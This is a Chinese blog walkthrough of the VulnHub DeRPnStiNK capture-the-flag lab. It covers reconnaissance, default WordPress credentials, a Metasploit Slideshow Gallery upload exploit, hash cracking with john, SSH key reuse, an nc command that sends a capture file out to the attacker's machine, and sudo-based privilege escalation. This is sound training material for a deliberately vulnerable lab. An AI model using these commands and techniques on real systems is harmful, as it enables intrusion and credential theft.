7-Vulnhub-DeRPnStiNK

最新推荐文章于 2024-04-17 21:17:18 发布
最新推荐文章于 2024-04-17 21:17:18 发布
阅读量243 收藏 1
点赞数
分类专栏: vulnhub50 文章标签: linux 数据库 vim mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43809826/article/details/118887158
版权

VulnHub-DeRPnStiNK

靶机地址:https://www.vulnhub.com/entry/derpnstink-1,221/

目标:得到root权限&找到四个flag.txt
作者:尼德霍格007
时间:2021-7-19

信息收集

漏洞复现环境使用vmware虚拟机,kali机与靶机都使用NAT网络

kali扫描目标主机ip地址

nmap -sP 192.168.21.0/24

image-20210718220159851

扫描靶机开放的1-10000的端口

nmap -A -p 1-10000 192.168.21.143

image-20210718220738885

可以看到目标机开放了21,22和80端口,分别对应FTP,SSH,和HTTP服务

访问HTTP服务,一个胖子和一个瘦子

image-20210718221102002

获得flag1

查看网页源码,找到flag1

image-20210718221229364

源码中还提示了个信息

image-20210718221355931

查看一下

image-20210718221434832

<-- @stinky, make sure to update your hosts file with local dns so the new derpnstink blog can be reached before it goes live -->

翻译一下就是要更新本地DNS服务器,才能访问博客

image-20210718221549369

但没说怎么更新,先放一边

爆破一下目录

dirb http://192.168.21.143/

image-20210718222545424

发现一个weblog目录,访问一下

image-20210718222656103

显示的是derpnstink.local/weblog

所以可能就是把derpnstink.local写入本地hosts文件,Linux的hosts文件在/etc目录下

image-20210718222006775

写入后保存退出

然后还有一个robots.txt

image-20210718223127612

image-20210718223207283

提示俩目录,看一下

image-20210718223321084

image-20210718223341925

没有有用信息

访问这个博客

image-20210718223645228

image-20210719002556212

看到此页面和底部的显示以及刚才使用dirb暴力破解的结果中含有wp-等相关字样,根据经验可知目标是个wordpress博客,所以直接尝试访问默认的管理员wp-admin页面看看

访问

http://derpnstink.local/weblog/wp-admin

填入admin/admin

image-20210718223819409

成功登录

image-20210718223933152

找了一会儿发现这个用户并不是真正的管理员,权限不高,只能管理幻灯片的播放

使用wpsan扫描一下看看

wpscan --url http://derpnstink.local/weblog/

image-20210718224604001

Slideshow Gallery存在漏洞,可以利用一下

getShell

使用msf查询一下有没有可利用漏洞

image-20210718225054353

找到两个相关的,第二个可以利用

use exploit/unix/webapp/wp_slideshowgallery_upload

配置选项里面有需要配置账号和密码,这里刚好在上面测试出来默认账号和密码都是admin,所以这里很好利用,命令如下(我这里1处打错了,2是正确的)

image-20210718225638985

image-20210718230220091

这里成功获得一个shell,但不是完整的shell,我们继续

shell

执行

python -c 'import pty; pty.spawn("/bin/bash")'

获得tty

image-20210718230021520

进入web所在目录下查看配置文件

image-20210718230707035

发现mysql数据库用户名是root,密码是mysql

连接mysql

mysql -u root -pmysql

image-20210718230836136

前面发现过一个mysql的管理界面,通过mysql账号密码登陆去看看

image-20210718231149427

发现flag2

在这里发现了第二个flag

image-20210718231253042

在wp-user表中发现了第二个用户unclestinky,密码是加密过的

image-20210718231505282

使用linux自带的john破解一下明文

先将密码存储到文件中

$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41

image-20210718231700902

使用john破解密码

john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

没有这个rockyou.txt库的,可以去github下载

image-20210718232402965

输出破解过的密码

image-20210718232418980

账户unclestinky密码wedgie57登陆

进来后看到了之前见过的flag2

(img-Gog8Elrl-1626627428441)

继续找

image-20210718232858269

在home下发现两个用户

试试用刚得到的密码wedgie57来SSH或者FTP登陆这两个账户,

SSH登陆

image-20210718233240380

发现ssh不支持密码密码登陆,只可以通过指纹登陆

FTP登陆

image-20210718233516836

使用mrderp登陆提示错误530,意思是没有这个用户,换用stinky/wedgie57

登陆成功,切换到web视图

image-20210718234008611

在network-logs目录下发现一个文件,中有一段对话,提示说修改密码的时候,进行了抓包

image-20210718234246215

在ftp://192.168.21.143/files/ssh/ssh/ssh/ssh/ssh/ssh/ssh/中找到了key秘钥

image-20210718234419879

下载下来,使用key登陆

ssh -i key.txt stinky@192.168.21.143

image-20210718234806763

提示权限不足,加权限

chmod 400 key.txt

image-20210718235004562

登陆成功

获得flag3

image-20210718235107487

继续找flag4

在Documents目录下发现了应该是刚刚在对话中提到的流量包

image-20210718235221415

下载下来,用wireshark查看

先kali执行:nc -l -p 4444 > derp.pcap 
然后目标靶机执行:nc 192.168.21.128 4444 < derpissues.pcap

192.168.21.128是我kali机的ip地址

image-20210718235947014

image-20210718235958270

wireshark打开

image-20210719000026877

太多了,http过滤一下

image-20210719000255399

找了半天终于找到了,密码derpderpderpderpderpderpderp

登录

ssh mrderp@192.168.21.143

image-20210719000417993

成功登录

image-20210719000549557

提权

这里提示访问https://pastebin.com/RzK9WfGw

image-20210719000645168

提示 mrderp ALL=(ALL) /home/mrderp/binaries/derpy*

大概意思:
允许mrderp用户在主机上以root用户权限读写执行/home/mrderp/binaries/目录下derpy开头的文件

image-20210719000751586

按照提示创建mrderp目录和derpy文件

image-20210719001604804

image-20210719001632107

image-20210719001645830

image-20210719001737467

image-20210719001805444

得到flag4

运行derpy.sh后提权成功

image-20210719001948588

在/root/Desktop目录下找到flag4

总结

这次的漏洞复现还是挺难得,跟着教程走还做了将近3小时,主要是这次在HTTP,SSH和FTP之间来回跳转让我感觉很有挑战性,还有路径爆破,wp-scan扫描,漏洞利用等让我学到很多之前没用过的东西,难度的提升才能让我进步的更快,加油!

尼德霍格007
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
小白的靶机-VulnHub-DerpNStink
wo41ge的博客
12-17 262
继续 继续 淦靶机 靶机地址:https://www.vulnhub.com/entry/derpnstink-1,221/ 目标:得到root权限&找到四个flag.txt ok 开始操作了 开机界面就是个这 轻车熟路 的搞一下 找到了此次CTF目标计算机IP地址:192.168.120.136 综合信息 21端口--FTP 22端口--SSH 80端口--HTTP 优先看看80端口 直接访问 F12找一找 作者可太行了 这不就有了吗 flag1=52E37291AEDF6A46D7D
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
VulnHub-Tr0ll1.zip
01-12
VulnHub-Tr0ll1靶机学习笔记,一部分是学习笔记过程,另一部分是学习过程整理的lol.pacp\.c文档、user.txt等文档,供大家参考学习
全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(五)DerpNStink:1【从外部网站到穿透内网提权!! !】
hyjcking的博客
11-28 814
这台靶机我用了将近两天的时间才拿下,真的是比较有难度的一台中级靶机,里面涉及到了许多渗透测试的知识和技巧,值得花时间好好研究一番。可以发现建站用的是wordpress,hh这就很舒服了,一般在打靶的时候发现wordpress建站说明就是突破口,我们可以用wpscan扫一下。得到密码为wedgie57,再登录一下刚才登的网站,用户名是Unclestinky,只找到了之前在数据库发现的flag2,没有其他信息了。之前nmap扫出来过22端口,尝试ssh登录,发现没法用密码登录,需要指纹密钥。
VULNHUB-DERPNSTINK: 1-靶机渗透
weixin_52374319的博客
05-13 744
VULNHUB-DERPNSTINK: 1-靶机渗透 靶机难度:中等(CTF) 靶场地址:https://www.vulnhub.com/entry/derpnstink-1,221/ kali攻击机ip:192.168.43.135 信息收集 arp-scan -l #扫描靶机ip 端口扫描 nmap -sC -sV -T4 192.168.43.73 可以看到21,22,80端口开放 访问80端口,呆呆二人组。。。。。 好干净的页面,看一下源代码找到第一个flag dirb目录爆破一
DerpNStink打靶思路详解(vulnhub),2024最新腾讯网络安全面试分享
最新发布
2401_84411822的博客
04-17 824
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
DeRPnStiNK靶机复盘
weixin_44681307的博客
07-09 330
phpmyadmin是数据库图形化管理界面,所以代表这个网页是有数据库的,我们就搜索一下wordpress的配置文件,通常数据库的账号密码都会在配置文件里面。su mrderp登陆一下,然后sudo -l发现他给了我们一个提醒,让我们在mrderp文件下创建一个binaries目录,在这个目录下创建derpy文件。发现上传成功,我们在kali中监听一下就进入到网站的后台了。sudo -l出现的这个意思就是这个目录下的这个文件是有root权限的,所以我们可以自己创建一个,然后利用这个文件进行提权。
Vulnhub-DERPNSTINK: 1-靶机渗透学习
嗯嗯呐的博客
11-19 1668
靶机地址:https://www.vulnhub.com/entry/derpnstink-1,221/ 靶机难度:中等(CTF) 靶机描述:这是基于Ubuntu的boot2root虚拟机。它已使用DHCP设置的网络接口在VMware Fusion和VMware Workstation12上进行了测试。它旨在模拟我在OSCP实验室中遇到的一些较早的机器,同时还带有一些较小的曲线球,但是没有什么花哨的。坚持经典的黑客方法,并列举所有内容! 目标:找到所有4个标志,最终将您带到完全root访问权限 作者:嗯嗯呐
Vulnhub:DeRPnStiNK渗透测试
mandarava的博客
03-08 977
老规矩,用nmap扫一下。发现端口80、22、21、514。输入命令nmap -T4 -a -v xxx.xxx.xxx.xxx。 Nmap scan report for xxx.xxx.xxx.xxx Host is up (1.2s latency). Not shown: 996 closed ports PORT STATE SERVICE 21/tcp open f...
2021年1月4日-Vulnhub-DerpNStink渗透学习
AnonyMousIT的博客
01-05 364
2021年1月4日-Vulnhub-DerpNStink渗透学习 靶机地址:https://www.vulnhub.com/entry/derpnstink-1,221/ kali地址:192.168.31.77 靶机IP地址:192.168.31.31 开放21、22、80端口 访问主页,发现flag1和/webnotes/info.txt路径,老手法了。 更新dns解析,才能访问blog 修改 /etc/hosts 文件 尝试访问robots.txt, 这是每次都不能放过的文件 访问一下
No.7-VulnHub-DerpNStink: 1-Walkthrough渗透学习
qq_34801745的博客
01-04 1579
** VulnHub-DerpNStink: 1-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/derpnstink-1,221/ 靶机难度:中级(CTF) 靶机发布日期:2018年2月9日 靶机描述:This is a boot2root Ubuntu based virtual machine. It was tested on VMwar...
打靶练习vulnhub: my-cmsms
04-10
打靶练习vulnhub: my-cmsms
打靶练习vulnhub:Insanity-Hosting
03-19
打靶练习vulnhub:Insanity-Hosting
vulnhub-Nagini.txt
06-10
Nagini
20-VulnHub-Brainpan2
尼德霍格007
08-30 1304
20-VulnHub-Brainpan2 靶机地址: 目标:得到root权限&找到flag.txt 作者:尼德霍格007 时间:2020-7-16 一、信息收集 扫描目标主机 nmap -sP 192.168.21.0/24 扫描开放端口 nmap -A -p- 192.168.21.142 可以看到开放了9999和10000两个端口,前一个是abyss服务,后一个是http服务 先看一下熟悉的http服务 整个页面就一张图片,源码也没有有用信息 看一下9999端口,使用nc连接 nc 1
17-VulnHub-Brainpan 1
尼德霍格007
08-12 776
17-VulnHub-brainpan 靶机地址:https://www.vulnhub.com/entry/brainpan-1,51/ 目标:得到root权限&找到四个flag.txt 作者:尼德霍格007 时间:2021-8-11 注意:此次渗透在VMware虚拟机中演示,kali机IP地址为192.168.21.128。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。 一、信息收集 nmap扫描网段 nmap -sP 192.168.21.0/24 扫描到靶机
1-VulnHub-GoldenEye-v1
尼德霍格007
07-07 706
靶机地址:https://www.vulnhub.com/entry/goldeneye-1,240/ 目标:得到root权限&找到flag.txt 作者:尼德 时间:2021-7-7 一、信息收集 打开kali虚拟机和目标机Golden Eye-v1,两台虚拟机网络都处于NAT模式 kali查看本机IP段,我的是192.168.21.0/24 nmap扫一下本网段 由于我这里只开了两台虚拟机,一台是kali,另一台扫描到的就是Golden Eye-v1,可以看到目标机的IP地址是192.16
18-VulnHub-pwnlab_init
尼德霍格007
08-13 695
18-VulnHub-PwnLab: init 靶机地址:https://www.vulnhub.com/entry/pwnlab-init,158/ 目标:得到root权限&找到flag.txt 作者:尼德霍格007 时间:2021-8-12 注意:此次渗透在VMware虚拟机中演示,kali机IP地址为192.168.21.128。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。 一、信息收集 nmap扫描靶机地址 看到靶机地址是192.168.21.6 扫描靶机
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

尼德霍格007

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值